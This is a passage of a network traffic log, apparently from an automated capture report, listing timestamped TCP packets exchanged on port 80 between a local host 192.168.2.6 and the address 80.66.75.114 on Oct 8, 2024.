                                                Oct 8, 2024 04:24:39.605770111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605792999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605803013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605806112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605820894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605844021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605864048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605870008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605895042 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605895996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605915070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605918884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605933905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605935097 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605973005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605974913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605987072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606009007 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606010914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606036901 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606039047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606059074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606061935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606071949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606093884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606106997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606117964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606142044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606158018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606173038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606195927 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606215000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606216908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606235027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606252909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606256962 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606273890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606296062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606317997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606337070 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606340885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606355906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606378078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606391907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606399059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606420040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606420040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606441021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606463909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606463909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606470108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606473923 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606499910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606513023 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606520891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606539965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606548071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606563091 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606570005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606589079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606590033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606607914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606618881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606633902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606637001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606661081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606662035 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606678963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606683016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606698990 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606714010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606722116 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606734991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606754065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606754065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606772900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606776953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606792927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606801033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606818914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606822968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606839895 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606863976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606868029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606885910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606909037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606910944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606924057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606930971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606950045 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606956005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606972933 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606978893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606992960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607000113 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607018948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607024908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607028008 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607047081 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607067108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607088089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607088089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607095003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607110023 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607116938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607136011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607137918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607156038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607167959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607181072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607189894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607208967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607209921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607230902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607230902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607245922 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607266903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607280970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607287884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607309103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607310057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607323885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607335091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607342958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607352018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607374907 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607374907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607397079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607409954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607418060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607449055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607470036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607487917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607510090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607512951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607523918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607531071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607541084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607552052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607563019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607573032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607594967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607594967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607615948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607615948 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.607629061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.607656956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703586102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703618050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703634024 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703672886 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703681946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703687906 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703704119 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703716040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703727007 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703747034 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703747034 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703768969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703788996 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703797102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703828096 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703849077 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703864098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703865051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703886032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703886032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703907013 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703916073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703924894 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703933954 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703952074 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703958035 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703972101 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.703986883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.703994036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704008102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704021931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704032898 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704041958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704058886 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704067945 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704093933 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704164028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704185963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704199076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704204082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704226017 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704229116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704235077 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704250097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.704265118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.704284906 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705266953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705285072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705307007 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705326080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705348969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705354929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705372095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705394030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705408096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705413103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705427885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705435991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705451965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705471992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705482960 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705513000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705517054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705533981 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705547094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705554962 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705569029 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705589056 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705642939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705666065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705677986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705686092 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705699921 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705707073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705719948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705729008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705740929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705745935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705763102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705769062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705781937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705789089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705804110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705811977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705823898 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705847025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705871105 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705888987 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.705908060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.705923080 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706042051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706059933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706099033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706109047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706123114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706146955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706161976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706167936 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706182957 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706191063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706206083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706219912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706240892 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706248045 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706260920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706268072 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706283092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706289053 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706298113 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706309080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706329107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706337929 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706346989 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706360102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706367970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706377029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706392050 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706397057 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706418991 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706425905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706442118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706448078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706465006 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706470966 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706482887 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706499100 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706516027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706520081 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706536055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706548929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706559896 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706572056 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706588030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706592083 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706609964 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706613064 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706624985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706634045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706646919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706660986 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706671953 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706676006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706691027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706696987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706697941 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706717968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706737041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706758022 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706775904 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706788063 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706796885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706815004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706824064 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706836939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706836939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706857920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706864119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706871033 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706881046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706891060 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706902027 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706923008 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706923008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706944942 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706944942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706964016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706979036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.706980944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.706999063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707022905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707040071 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707042933 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707066059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707083941 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707083941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707103968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707123041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707140923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707144022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707165956 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707170010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707190037 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707197905 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707211018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707214117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707223892 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707240105 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707247972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707262039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707278967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707292080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707300901 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707321882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707346916 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707356930 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707360983 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707396030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707400084 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707416058 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.707434893 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.707438946 CEST804973880.66.75.114192.168.2.6
